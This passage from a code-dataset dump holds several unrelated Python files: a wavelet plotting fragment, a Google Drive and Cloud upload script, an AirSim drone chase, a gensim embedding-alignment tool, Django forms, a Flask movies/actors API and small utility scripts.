matplotlib import rc\n\t# rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n\t# ## for Palatino and other serif fonts use:\n\t# #rc('font',**{'family':'serif','serif':['Palatino']})\n\t# rc('text', usetex=True)\n\tcolor = np.array([0, 0, 256.])/256.\n\tcolor = (color[0], color[1], color[2])\n\n\tplt.subplot(121)\n\tplt.spy(M, markersize=4, marker = 'o', color =color )\n\t# plt.title(r'M_{4,0}')\n\tplt.subplot(122)\n\tplt.spy(M_t,markersize=4, marker = 'o', color =color)\n\t# plt.title(r'\\tilde{M}_{4,0}')\n\t# plt.subplot(212)\n\t# plt.spy(G,markersize=5, marker = 'o', color ='0.4')\n\tplt.show() \n\t# import tikzplotlib\n\n\t# tikzplotlib.save(\"sparsity_pattern.tex\")\n\n\n\n\t\n\n\n\n\n","sub_path":"src/wavelet_basis.py","file_name":"wavelet_basis.py","file_ext":"py","file_size_in_byte":7581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"386845435","text":"import argparse\nimport json\nimport os\n\nfrom core_data_modules.logging import Logger\nfrom storage.google_cloud import google_cloud_utils\nfrom storage.google_drive import drive_client_wrapper\n\nfrom src.lib import PipelineConfiguration\n\nLogger.set_project_name(\"IMAQAL\")\nlog = Logger(__name__)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Uploads output files\")\n\n parser.add_argument(\"user\", help=\"User launching this program\")\n parser.add_argument(\"google_cloud_credentials_file_path\", metavar=\"google-cloud-credentials-file-path\",\n help=\"Path to a Google Cloud service account credentials file to use to access the \"\n \"credentials bucket\")\n parser.add_argument(\"pipeline_configuration_file_path\", metavar=\"pipeline-configuration-file-path\",\n help=\"Path to the pipeline configuration json file\")\n parser.add_argument(\"run_id\", metavar=\"run-id\",\n help=\"Identifier of this pipeline run\")\n parser.add_argument(\"production_csv_input_path\", metavar=\"production-csv-input-path\",\n help=\"Path to a CSV file with raw message and demographic response, for use in \"\n \"radio show production\"),\n parser.add_argument(\"messages_csv_input_path\", metavar=\"messages-csv-input-path\",\n help=\"Path to analysis dataset CSV where messages are the unit for analysis (i.e. one message \"\n \"per row)\"),\n parser.add_argument(\"individuals_csv_input_path\", metavar=\"individuals-csv-input-path\",\n help=\"Path to analysis dataset CSV where respondents are the unit for analysis (i.e. 
one \"\n \"respondent per row, with all their messages joined into a single cell)\"),\n parser.add_argument(\"memory_profile_file_path\", metavar=\"memory-profile-file-path\",\n help=\"Path to the memory profile log file to upload\")\n parser.add_argument(\"data_archive_file_path\", metavar=\"data-archive-file-path\",\n help=\"Path to the data archive file to upload\")\n parser.add_argument(\"pipeline_run_mode\", help=\"whether to generate analysis files or not\", choices=[\"all-stages\", \"auto-code-only\"])\n\n args = parser.parse_args()\n\n user = args.user\n google_cloud_credentials_file_path = args.google_cloud_credentials_file_path\n pipeline_configuration_file_path = args.pipeline_configuration_file_path\n run_id = args.run_id\n production_csv_input_path = args.production_csv_input_path\n messages_csv_input_path = args.messages_csv_input_path\n individuals_csv_input_path = args.individuals_csv_input_path\n memory_profile_file_path = args.memory_profile_file_path\n data_archive_file_path = args.data_archive_file_path\n pipeline_run_mode = args.pipeline_run_mode\n\n log.info(\"Loading Pipeline Configuration File...\")\n with open(pipeline_configuration_file_path) as f:\n pipeline_configuration = PipelineConfiguration.from_configuration_file(f)\n\n log.info(f\"Downloading Google Drive service account credentials...\")\n credentials_info = json.loads(google_cloud_utils.download_blob_to_string(\n google_cloud_credentials_file_path, pipeline_configuration.drive_upload.drive_credentials_file_url))\n drive_client_wrapper.init_client_from_info(credentials_info)\n\n log.info(\"Uploading production file to Google Drive...\")\n production_csv_drive_dir = os.path.dirname(pipeline_configuration.drive_upload.production_upload_path)\n production_csv_drive_file_name = os.path.basename(pipeline_configuration.drive_upload.production_upload_path)\n drive_client_wrapper.update_or_create(production_csv_input_path, production_csv_drive_dir,\n target_file_name=production_csv_drive_file_name,\n target_folder_is_shared_with_me=True)\n\n if pipeline_run_mode == \"all-stages\":\n log.info(\"Uploading Analysis CSVs to Google Drive...\")\n\n messages_csv_drive_dir = os.path.dirname(pipeline_configuration.drive_upload.messages_upload_path)\n messages_csv_drive_file_name = os.path.basename(pipeline_configuration.drive_upload.messages_upload_path)\n drive_client_wrapper.update_or_create(messages_csv_input_path, messages_csv_drive_dir,\n target_file_name=messages_csv_drive_file_name,\n target_folder_is_shared_with_me=True)\n\n individuals_csv_drive_dir = os.path.dirname(pipeline_configuration.drive_upload.individuals_upload_path)\n individuals_csv_drive_file_name = os.path.basename(pipeline_configuration.drive_upload.individuals_upload_path)\n drive_client_wrapper.update_or_create(individuals_csv_input_path, individuals_csv_drive_dir,\n target_file_name=individuals_csv_drive_file_name,\n target_folder_is_shared_with_me=True)\n\n memory_profile_upload_location = f\"{pipeline_configuration.memory_profile_upload_url_prefix}{run_id}.profile\"\n log.info(f\"Uploading the memory profile from {memory_profile_file_path} to \"\n f\"{memory_profile_upload_location}...\")\n with open(memory_profile_file_path, \"rb\") as f:\n google_cloud_utils.upload_file_to_blob(\n google_cloud_credentials_file_path, memory_profile_upload_location, f\n )\n\n data_archive_upload_location = f\"{pipeline_configuration.data_archive_upload_url_prefix}{run_id}.tar.gzip\"\n log.info(f\"Uploading the data archive from {data_archive_file_path} to \"\n 
f\"{data_archive_upload_location}...\")\n with open(data_archive_file_path, \"rb\") as f:\n google_cloud_utils.upload_file_to_blob(\n google_cloud_credentials_file_path, data_archive_upload_location, f\n )\n","sub_path":"upload_files.py","file_name":"upload_files.py","file_ext":"py","file_size_in_byte":5934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"346253342","text":"#!/usr/bin/env python\n\nimport rospy\n\nimport sys, select, termios, tty\nimport airsim\nimport math\nimport random\n\n\"\"\"\nIn settings.json:\n \"Drone2\": {\n \"VehicleType\": \"SimpleFlight\",\n \"DefaultVehicleState\": \"Inactive\",\n \"X\": 8, \"Y\": 0, \"Z\": -2\n }\n\"\"\"\n\ndef drone_chase():\n\n rospy.init_node('chase')\n # rate = rospy.Rate(10) # 10hz\n\n # Setup drone\n client = airsim.MultirotorClient()\n client.confirmConnection()\n client.enableApiControl(True, \"Drone1\")\n client.enableApiControl(True, \"Drone2\")\n client.armDisarm(True, \"Drone1\")\n client.armDisarm(True, \"Drone2\")\n\n airsim.wait_key('Press any key to takeoff')\n f1 = client.takeoffAsync(vehicle_name=\"Drone1\")\n f2 = client.takeoffAsync(vehicle_name=\"Drone2\")\n f1.join()\n f2.join()\n\n x1 = -1 * random.randint(2, 7)\n y1 = random.randint(-3, 4)\n z1 = random.randint(-7, -4)\n x2 = -1 * random.randint(2, 6)\n y2 = random.randint(2, 5)\n z2 = random.randint(-7, -4)\n speed1 = random.randint(1, 3)\n speed2 = speed1 + 1\n f1 = client.moveToPositionAsync(x1, y1, z1, speed1, vehicle_name=\"Drone1\")\n f2 = client.moveToPositionAsync(x2, y2, z2, speed2, vehicle_name=\"Drone2\")\n f1.join()\n f2.join()\n print(\"x:\" + str(x1))\n print(\"y: \" + str(y1))\n print(\"z: \" + str(z1))\n\n # f1 = client.rotateToYawAsync(180., vehicle_name =\"Drone1\")\n # f2 = client.rotateToYawAsync(180., vehicle_name =\"Drone2\")\n # f1.join()\n # f2.join()\n # print(\"turned\")\n\n while not rospy.is_shutdown():\n x1 = x1 + -1 * random.randint(2, 4)\n y1 = random.randint(y1-3, y1+4)\n z1 = random.randint(z1-1, z1+1)\n x2 = x1 + random.randint(2, 4)\n y2 = random.randint(y1+2, y1+5)\n z2 = random.randint(z1-1, z1+1)\n speed1 = random.randint(1, 3)\n speed2 = speed1 + 1\n\n client.enableApiControl(True, \"Drone1\")\n client.enableApiControl(True, \"Drone2\")\n client.armDisarm(True, \"Drone1\")\n client.armDisarm(True, \"Drone2\")\n f1 = client.moveToPositionAsync(x1, y1, z1, speed1, vehicle_name=\"Drone1\",\n drivetrain=airsim.DrivetrainType.MaxDegreeOfFreedom,\n yaw_mode=airsim.YawMode(is_rate=True, yaw_or_rate=20))\n f2 = client.moveToPositionAsync(x2, y2, z2, speed2, vehicle_name=\"Drone2\")\n # f1.join()\n # f2.join()\n\n print(\"\\n\\n\\n\\nx:\" + str(x1))\n print(\"y: \" + str(y1))\n print(\"z: \" + str(z1))\n print(\"\\n\\nDrone1:\")\n print(client.getMultirotorState(vehicle_name=\"Drone1\"))\n print(\"\\n\\nDrone2:\")\n print(client.getMultirotorState(vehicle_name=\"Drone2\"))\n\n rospy.sleep(2)\n\n client.armDisarm(False, \"Drone1\")\n client.armDisarm(False, \"Drone2\")\n client.reset()\n\n # that's enough fun for now. 
let's quit cleanly\n    client.enableApiControl(False, \"Drone1\")\n    client.enableApiControl(False, \"Drone2\")\n\n\nif __name__ == '__main__':\n    try:\n        drone_chase()\n    except rospy.ROSInterruptException:\n        pass\n","sub_path":"scripts/experiments/droneChase.py","file_name":"droneChase.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"314038770","text":"my_list = [1, 4, 9, 16, 25, 36, 49, 64, 81, 100]\nl = []\nfor item in my_list:\n    if item % 2 == 0:\n        l.append(item)\nprint(l)\n\nrl = [x for x in my_list if not x % 2]\nprint(rl)\n\n\nz = True \nwhile z:\n    a = int(input(\"Enter mark: \"))\n    if a > 85:\n        print('distinction')\n    elif 65 <= a <= 85:\n        print('pass')\n    elif a == 0:\n        z = False\n        print(\"finished\")\n    else:\n        print('Fail')\n","sub_path":"Python(Beg)/work5.py","file_name":"work5.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"265314890","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os, time, gensim, sys, json\nfrom gensim.models import translation_matrix\nfrom gensim.models import KeyedVectors\nimport matplotlib.pyplot as plt\nfrom scipy import spatial\nimport numpy as np\nimport multiprocessing\nfrom joblib import Parallel, delayed\n\n\"\"\" Distributional model for Linguistic shift time series construction\n    For each time slot,\n    [1] load in gensim word2vec models generated with gensim_models.py \n    [2] align all vectors to the last vector\n    [3] compute the distances between each vector and the first vector (just model[\"searchword\"] vectors)\n    [4] plot a time series of the distances between vectors\n\"\"\"\n\n\ndef smart_procrustes_align_gensim(base_embed, other_embed, words=None):\n    \"\"\" Procrustes align two gensim word2vec models (to allow for comparison between same word across models).\n    Code ported from HistWords by William Hamilton .\n    (With help from William. Thank you!)\n    First, intersect the vocabularies (see `intersection_align_gensim` documentation).\n    Then do the alignment on the other_embed model.\n    Replace the other_embed model's syn0 and syn0norm numpy matrices with the aligned version.\n    Return other_embed.\n    If `words` is set, intersect the two models' vocabulary with the vocabulary in words (see `intersection_align_gensim` documentation).\n    \"\"\"\n    # make sure vocabulary and indices are aligned\n    in_base_embed, in_other_embed = intersection_align_gensim(base_embed, other_embed, words=words)\n\n    # get the embedding matrices\n    base_vecs = in_base_embed.wv.syn0norm\n    other_vecs = in_other_embed.wv.syn0norm\n\n    # just a matrix dot product with numpy\n    m = other_vecs.T.dot(base_vecs)\n    # SVD method from numpy\n    u, _, v = np.linalg.svd(m)\n    # another matrix operation\n    ortho = u.dot(v)\n    # Replace original array with modified one\n    # i.e. 
multiplying the embedding matrix (syn0norm)by \"ortho\"\n other_embed.wv.syn0norm = other_embed.wv.syn0 = (other_embed.wv.syn0norm).dot(ortho)\n return other_embed\n\n\ndef intersection_align_gensim(m1,m2, words=None):\n \"\"\"\n Intersect two gensim word2vec models, m1 and m2.\n Only the shared vocabulary between them is kept.\n If 'words' is set (as list or set), then the vocabulary is intersected with this list as well.\n Indices are re-organized from 0..N in order of descending frequency (=sum of counts from both m1 and m2).\n These indices correspond to the new syn0 and syn0norm objects in both gensim models:\n -- so that Row 0 of m1.syn0 will be for the same word as Row 0 of m2.syn0\n -- you can find the index of any word on the .index2word list: model.index2word.index(word) => 2\n The .vocab dictionary is also updated for each model, preserving the count but updating the index.\n \"\"\"\n\n # Get the vocab for each model\n vocab_m1 = set(m1.wv.vocab.keys())\n vocab_m2 = set(m2.wv.vocab.keys())\n\n # Find the common vocabulary\n common_vocab = vocab_m1&vocab_m2\n if words: common_vocab&=set(words)\n\n # If no alignment necessary because vocab is identical...\n if not vocab_m1-common_vocab and not vocab_m2-common_vocab:\n return (m1,m2)\n\n # Otherwise sort by frequency (summed for both)\n common_vocab = list(common_vocab)\n common_vocab.sort(key=lambda w: m1.wv.vocab[w].count + m2.wv.vocab[w].count,reverse=True)\n\n # Then for each model...\n for m in [m1,m2]:\n # Replace old syn0norm array with new one (with common vocab)\n indices = [m.wv.vocab[w].index for w in common_vocab]\n old_arr = m.wv.syn0norm\n new_arr = np.array([old_arr[index] for index in indices])\n m.wv.syn0norm = m.wv.syn0 = new_arr\n\n # Replace old vocab dictionary with new one (with common vocab)\n # and old index2word with new one\n m.index2word = common_vocab\n old_vocab = m.wv.vocab\n new_vocab = {}\n for new_index,word in enumerate(common_vocab):\n old_vocab_obj=old_vocab[word]\n new_vocab[word] = gensim.models.word2vec.Vocab(index=new_index, count=old_vocab_obj.count)\n m.wv.vocab = new_vocab\n\n return (m1,m2)\n\n\ndef get_neighbor (fname, word):\n sid = fname.split('/')[-1].split('.')[0]\n date = get_date(sid)\n model = gensim.models.Word2Vec.load(fname)\n model.init_sims()\n matches = \"\"\n\n if word in model.wv.vocab:\n matches = model.wv.most_similar(word, topn=10)\n else:\n print (\"skipping model: \", sid, date)\n \n\n return date, matches \n\ndef get_date (sessionid):\n datefile = './data/congressional-globe/dates.csv'\n with open(datefile, \"r\") as f:\n for line in f:\n if line[0] != '#':\n tokens = line.rstrip().split(',')\n if tokens[0] == sessionid:\n date = tokens[1]\n return date\n\ndef make_json (distances):\n session = {}\n sessions = []\n for j,k in distances: \n session['date'] = j \n session['similarity'] = k \n sessions.append(session.copy())\n return json.dumps(sessions)\n\ndef get_filelist(word):\n f = open(\"./data/embeddings/vocab/all.vocab\",\"r\")\n sessions = []\n contain_word = []\n\n for line in f:\n sessions.append(json.loads(line))\n\n for i in range (0, len(sessions)):\n session = sessions[i]\n if word in session[\"vocabulary\"]:\n contain_word.append(\"./data/embeddings/models/\"+session[\"id\"]+\".model\")\n\n return contain_word[0], contain_word\n\n\ndef main():\n word = sys.argv[1].lower()\n num_cores = int(sys.argv[2])\n\n base, filelist = get_filelist(word)\n\n #distances = Parallel(n_jobs=num_cores)(delayed(get_distances)(base, fname, word) for fname in filelist)\n 
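# Added sketch (not part of the original script): a tiny self-contained check of the\n    # orthogonal Procrustes step documented in smart_procrustes_align_gensim above.\n    # For an orthogonal toy matrix, the rotation u.dot(v) maps `other` exactly back onto `base`.\n    toy_base = np.eye(3)\n    toy_other = np.eye(3)[[1, 0, 2]]  # a permuted (hence orthogonal) copy of toy_base\n    toy_u, _, toy_v = np.linalg.svd(toy_other.T.dot(toy_base))\n    assert np.allclose(toy_other.dot(toy_u.dot(toy_v)), toy_base)\n    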
distances = Parallel(n_jobs=num_cores)(delayed(get_neighbor)(fname, word) for fname in filelist)\n for d in distances:\n ws = []\n for s in d[1]:\n ws.append(s[0])\n print (d[0] + \": \" +\" \".join(ws))\n\n #json = make_json(distances)\n #print (json)\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"api/neighbors.py","file_name":"neighbors.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"571520877","text":"from django import forms\r\nfrom django.utils.translation import ugettext as _\r\n\r\nfrom .models import ClinicalData, NULL_CHOICES, BLANK_CHOICES\r\n\r\nfrom string import digits\r\n\r\nDAYS_TO_BIRTH_CHOICES = (\r\n ('0-9', '0-9'),\r\n ('10-19', '10-19'),\r\n ('20-29', '20-29'),\r\n ('30-39', '30-39'),\r\n ('40-49', '40-49'),\r\n ('50-59', '50-59'),\r\n ('60-69', '60-69'),\r\n ('70-79', '70-79'),\r\n ('80-89', '80-89'),\r\n ('90-99', '90-99'),\r\n)\r\n\r\nPATHOLOGIC_STAGE_CHOICES = (\r\n ('StageI', 'StageI'), \r\n ('StageII', 'StageII'), \r\n ('StageIII', 'StageIII'), \r\n ('StageIV', 'StageIV'), \r\n)\r\n\r\nSMOKING_HISTORY_CHOICES = (\r\n ('1', '1'),\r\n ('2', '2'),\r\n ('3', '3'),\r\n ('4', '4'),\r\n ('5+', '5+'),\r\n)\r\n\r\nDAYS_TO_DEATH_CHOICES = (\r\n ('0-0.5', '0-0.5'), \r\n ('0.5-1', '0.5-1'), \r\n ('1-1.5', '1-1.5'), \r\n ('1.5-2', '1.5-2'), \r\n ('2-2.5', '2-2.5'), \r\n ('2.5-3', '2.5-3'), \r\n ('3-3.5', '3-3.5'), \r\n ('3.5-4', '3.5-4'), \r\n ('4-4.5', '4-4.5'), \r\n ('4.5-5', '4.5-5'), \r\n ('5', '5'), \r\n)\r\n\r\nAGE_AT_DIAGNOSIS_CHOICES = (\r\n ('0-9', '0-9'),\r\n ('10-19', '10-19'),\r\n ('20-29', '20-29'),\r\n ('30-39', '30-39'),\r\n ('40-49', '40-49'),\r\n ('50-59', '50-59'),\r\n ('60-69', '60-69'),\r\n ('70-79', '70-79'),\r\n ('80-89', '80-89'),\r\n ('90+', '90+'),\r\n)\r\n\r\ndef get_all_choices(field_name, empty_type):\r\n return ()\r\n tmp_data = ClinicalData.objects.distinct(field_name).order_by(field_name).values_list(field_name)\r\n result = []\r\n for i in tmp_data:\r\n if i is None:\r\n if empty_type is None:\r\n result.append(NULL_CHOICES[0])\r\n else:\r\n result.append(BLANK_CHOICES[0])\r\n else:\r\n result.append((i,i,))\r\n return tuple(result)\r\n\r\nDAYS_TO_DIAGNOSIS_CHOICES = get_all_choices('days_to_diagnosis', None)\r\n\r\nDAYS_TO_FOLLOWUP_CHOICES = tuple(zip([digits, digits]))\r\n\r\nICD_10_CHOICES = get_all_choices('icd_10', '')\r\nICD_O_3_HISTOLOGY_CHOICES = get_all_choices('icd_o_3_histology', '')\r\nICD_O_3_SITE_CHOICES = get_all_choices('icd_o_3_site', '')\r\n\r\nNUMBER_OF_LYMPH_EXAMINED_CHOICES = (\r\n ('0-9', '0-9'),\r\n ('10-19', '10-19'),\r\n ('20-29', '20-29'),\r\n ('30-39', '30-39'),\r\n ('40-49', '40-49'),\r\n ('50-59', '50-59'),\r\n ('60-69', '60-69'),\r\n ('70-79', '70-79'),\r\n ('80-89', '80-89'),\r\n ('90+', '90+'),\r\n)\r\n\r\nPATHOLOGIC_M_CHOICES = (\r\n ('M0', 'M0'),\r\n ('M1', 'M1'),\r\n ('Mx', 'Mx'),\r\n)\r\n\r\nPATHOLOGIC_N_CHOICES = (\r\n ('N0', 'N0'),\r\n ('N1', 'N1'),\r\n ('N2', 'N2'),\r\n ('Nx', 'Nx'),\r\n)\r\n\r\nPATHOLOGIC_T_CHOICES = (\r\n ('T0', 'T0'),\r\n ('T1', 'T1'),\r\n ('T2', 'T2'),\r\n ('Tx', 'Tx'),\r\n)\r\n\r\nYEAR_OF_DIAGNOSIS_CHOICES = get_all_choices('year_of_diagnosis', None)\r\n\r\nclass SampleFilterForm(forms.ModelForm):\r\n check = forms.BooleanField(label=_('Use this group'), )\r\n\r\n class Meta:\r\n model = ClinicalData\r\n exclude = ('id', 'samples', 'sample_ids', 'donor_id', )\r\n choices = {\r\n 'days_to_birth': DAYS_TO_BIRTH_CHOICES,\r\n 'pathologic_stage': PATHOLOGIC_STAGE_CHOICES,\r\n 
'smoking_history': SMOKING_HISTORY_CHOICES,\r\n 'days_to_death': DAYS_TO_DEATH_CHOICES,\r\n 'age_at_diagnosis': AGE_AT_DIAGNOSIS_CHOICES,\r\n 'days_to_diagnosis': DAYS_TO_DIAGNOSIS_CHOICES,\r\n 'days_to_followup': DAYS_TO_FOLLOWUP_CHOICES,\r\n 'number_of_lymph_examined': NUMBER_OF_LYMPH_EXAMINED_CHOICES,\r\n 'pathologic_m': PATHOLOGIC_M_CHOICES,\r\n 'pathologic_n': PATHOLOGIC_N_CHOICES,\r\n 'pathologic_t': PATHOLOGIC_T_CHOICES,\r\n 'year_of_diagnosis': YEAR_OF_DIAGNOSIS_CHOICES,\r\n }\r\n\r\n'''\r\nclass PrivateDataUploadForm(forms.Form):\r\n datafile = models.FileField()\r\n\r\nclass StatsTableForm(forms.Form):\r\n draw = forms.InputField()\r\n\r\nclass PrivateDataDeleteForm(forms.Form):\r\n file_code = forms.InputField()\r\n\r\nclass JobSubmitForm(forms.Form):\r\n condition = forms.TextField()\r\n\r\nclass JobDeleteForm(forms.Form):\r\n job_code = forms.TextField()\r\n\r\nclass ContidtionFilterForm(forms.Form):\r\n condition_code = forms.TextField()\r\n\r\nclass CommentForm(forms.Form):\r\n job_code = forms.TextField()\r\n\r\nclass ToolForm(forms.Form):\r\n name = forms.TextField()\r\n\r\nclass ToolDeleteForm(forms.Form):\r\n tool_code = forms.TextForm()\r\n\r\nclass ArgumentForm(forms.Form):\r\n tool_code = forms.TextField()\r\n'''","sub_path":"website/main/forms.tmp.py","file_name":"forms.tmp.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"534951694","text":"import os\nfrom flask import Flask, request, abort, jsonify\nfrom flask_cors import CORS\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nimport sys\nimport traceback\nfrom models import Movies, Actors, setup_db\nimport json\nfrom auth.auth import AuthError, requires_auth\n\n\napp = Flask(__name__)\ndb = setup_db(app)\nCORS(app)\n\n\n'''Set up CORS. 
Allow '*' for origins.'''\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n\n\n'''Using the after request decorator to se Access-Control-Allow'''\n\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type,Authorization,true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET,PATCH,POST,DELETE,OPTIONS')\n return response\n\n\n@app.route('/Movies', methods=['GET'])\n@requires_auth('get:movies')\ndef get_movies(jwt):\n movies = Movies.query.all()\n if len(movies) == 0:\n abort(404)\n formatted_movies = [mov.format() for mov in movies]\n return jsonify({\n 'success': True,\n 'movies': formatted_movies\n }), 200\n\n\n@app.route('/Movies', methods=['POST'])\n@requires_auth('post:movies')\ndef add_movies(jwt):\n data = request.get_json()\n if 'title' not in data:\n abort(422)\n if 'release_date' not in data:\n abort(422)\n new_title = data.get('title')\n new_release_date = data.get('release_date')\n try:\n new_movie = Movies(\n title=new_title,\n release_date=new_release_date\n )\n new_movie.insert()\n except:\n abort(422)\n return jsonify({\n 'success': True,\n 'movie': new_movie.format()\n }), 200\n\n\n@app.route('/Movies/', methods=['DELETE'])\n@requires_auth('delete:movies')\ndef delete_movie(jwt, id):\n try:\n movie_to_delete = Movies.query.get(id)\n movie_to_delete.delete()\n id = movie_to_delete.id\n return jsonify({\n 'success': True,\n 'deleted': id\n }), 200\n except:\n abort(422)\n\n\n@app.route('/Movies/', methods=['PATCH'])\n@requires_auth('patch:movies')\ndef update_movie(jwt, id):\n movie_to_update = Movies.query.get(id)\n if movie_to_update is None:\n abort(404)\n\n data = request.get_json()\n if 'title' in data:\n if data.get('title') is None:\n abort(400)\n movie_to_update.title = data.get('title')\n\n if 'release_date' in data:\n if data.get('release_date') is None:\n abort(400)\n movie_to_update.release_date = data.get('release_date')\n try:\n movie_to_update.update()\n\n return jsonify({\n 'success': True,\n 'movie': movie_to_update.format()\n }), 200\n except:\n abort(422)\n\n\n@app.route('/Actors', methods=['GET'])\n@requires_auth('get:actors')\ndef get_actors(jwt):\n actors = Actors.query.all()\n if len(actors) == 0:\n abort(404)\n formatted_actors = [act.format() for act in actors]\n return jsonify({\n 'success': True,\n 'actors': formatted_actors\n }), 200\n\n\n@app.route('/Actors', methods=['POST'])\n@requires_auth('post:actors')\ndef add_actors(jwt):\n data = request.get_json()\n if 'name' not in data:\n abort(422)\n if 'age' not in data:\n abort(422)\n if 'gender' not in data:\n abort(422)\n try:\n new_actor = Actors(\n name=data.get('name'),\n age=data.get('age'),\n gender=data.get('gender')\n )\n new_actor.insert()\n except:\n abort(422)\n return jsonify({\n 'success': True,\n 'actor': new_actor.format()\n }), 200\n\n\n@app.route('/Actors/', methods=['DELETE'])\n@requires_auth('delete:actors')\ndef delete_actor(jwt, id):\n try:\n actor = Actors.query.filter(Actors.id == id).one_or_none()\n actor.delete()\n return jsonify({\n 'success': True,\n 'deleted': id\n }), 200\n except:\n abort(422)\n\n\n@app.route('/Actors/', methods=['PATCH'])\n@requires_auth('patch:actors')\ndef update_actor(jwt, id):\n actor_to_update = Actors.query.get(id)\n if actor_to_update is None:\n abort(404)\n data = request.get_json()\n if 'name' in data:\n if data.get('name') is None:\n abort(400)\n actor_to_update.name = data.get('name')\n if 'age' in data:\n if data.get('age') is None:\n abort(400)\n 
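# Added note (sketch, not part of the original file): every optional key in\n        # this handler follows the same guard-then-copy pattern, so a partial\n        # update such as PATCH /Actors/1 with body {\"age\": 36} changes only\n        # the fields the request actually carries.\n        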
actor_to_update.age = data.get('age')\n if 'gender' in data:\n if data.get('gender') is None:\n abort(400)\n actor_to_update.gender = data.get('gender')\n try:\n actor_to_update.update()\n except:\n abort(422)\n return jsonify({\n 'success': True,\n 'actor': actor_to_update.format(),\n }), 200\n\n\n@app.errorhandler(AuthError)\ndef auth_error(error):\n return jsonify({\n \"success\": False,\n \"error\": error.status_code,\n \"message\": error.error['description']\n }), error.status_code\n\n@app.errorhandler(400)\ndef bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 400,\n \"message\": 'Bad Request'\n }), 400\n \n\n@app.errorhandler(404)\ndef not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"resource not found\"\n }), 404\n\n\n@app.errorhandler(422)\ndef unprocessable(error):\n return jsonify({\n \"success\": False,\n \"error\": 422,\n \"message\": 'Unprocessable entity'\n }), 422\n\n\n\n@app.route('/')\ndef get_greeting():\n greeting = \"Welcome to my final FSND project\"\n return greeting\n\n\nif __name__ == '__main__':\n app.run(port=8080, debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"86110600","text":"\nfrom Foundations.WeightedGrid import WeightedGrid\nfrom Algorithms.RecursiveBacktracker import RecursiveBacktracker as rb\n\nchester = rb()\ngrid = chester.on(WeightedGrid(10, 10))\n\ngrid.braid(0.5)\nprint('braided')\n\nstart, finish = grid[0][0], grid[grid.rows-1][grid.columns-1]\nprint('started')\ndists = start.get_distances()\ngrid.set_distances(dists)\n\nimg = grid.to_png()\nimg.save('Output\\weightedmaze.png')\nprint('done with one')\n\nlava = grid.random_dist()\nlava.weight = 50\nprint('made lava')\n\ngrid.set_distances(start.get_distances().path_to(finish))\nprint('got distances')\n\nimg2 = grid.to_png()\nimg2.save('Output\\Astar.png')\n","sub_path":"Mazes/WeightedDemo.py","file_name":"WeightedDemo.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"484274836","text":"from glob import glob\nimport os.path\nimport cv2\n\nsave_path = \"d:/Selected_Img\"\npeople = glob(\"d:/AIhub/2017/High_Resolution/High_Resolution/*\")\nn = 0\nfor person in people:\n n += 1\n # print(person)\n person_num = person[-8:]\n # print(person_num)\n for l in range(6):\n personpath = []\n personpath = (person[:-9] + '/'+ person_num +'/S001/L' + str(l+1) + '/E01/*.jpg')\n # print(personpath)\n imgs = glob(personpath)\n # print(imgs)\n for img in imgs:\n C_index = img.find('C')\n angle = int(img[C_index+1:-4])\n # print(angle)\n if angle > 13:\n continue\n # print(img)\n path = save_path + '/{0:03}-{1}-{2:02}.jpg'.format(n, l+1, angle)\n # print(path)\n image = cv2.imread(img)\n cv2.imwrite(path, image)\n\nprint(n)\n","sub_path":"Fix/jpg_selection_2017.py","file_name":"jpg_selection_2017.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"636601862","text":"from odoo import api, models, fields, models, _\nfrom datetime import datetime,timedelta,time\n\nclass SaleQuotation(models.Model):\n _name = \"sale.quotation\"\n _description = \"Sale Quotation\"\n\n # @api.multi\n # @api.onchange('partner_id')\n # def onchange_partner_id(self):\n # \"\"\"\n # Update the following fields when the partner is 
changed:\n    #     - Pricelist\n    #     - Payment term\n    #     - Invoice address\n    #     - Delivery address\n    #     \"\"\"\n    #     if not self.partner_id:\n    #         self.update({\n    #             'partner_invoice_id': False,\n    #             'partner_shipping_id': False,\n    #             'payment_term_id': False,\n    #             'fiscal_position_id': False,\n    #         })\n    #         return\n\n    #     addr = self.partner_id.address_get(['delivery', 'invoice'])\n    #     values = {\n    #         'pricelist_id': self.partner_id.property_product_pricelist and self.partner_id.property_product_pricelist.id or False,\n    #         'payment_term_id': self.partner_id.property_payment_term_id and self.partner_id.property_payment_term_id.id or False,\n    #         'partner_invoice_id': addr['invoice'],\n    #         'partner_shipping_id': addr['delivery'],\n    #     }\n    #     if self.env.user.company_id.sale_note:\n    #         values['note'] = self.with_context(lang=self.partner_id.lang).env.user.company_id.sale_note\n\n    #     if self.partner_id.user_id:\n    #         values['user_id'] = self.partner_id.user_id.id\n    #     if self.partner_id.team_id:\n    #         values['team_id'] = self.partner_id.team_id.id\n    #     self.update(values)\n\n    @api.onchange('partner_id')\n    def 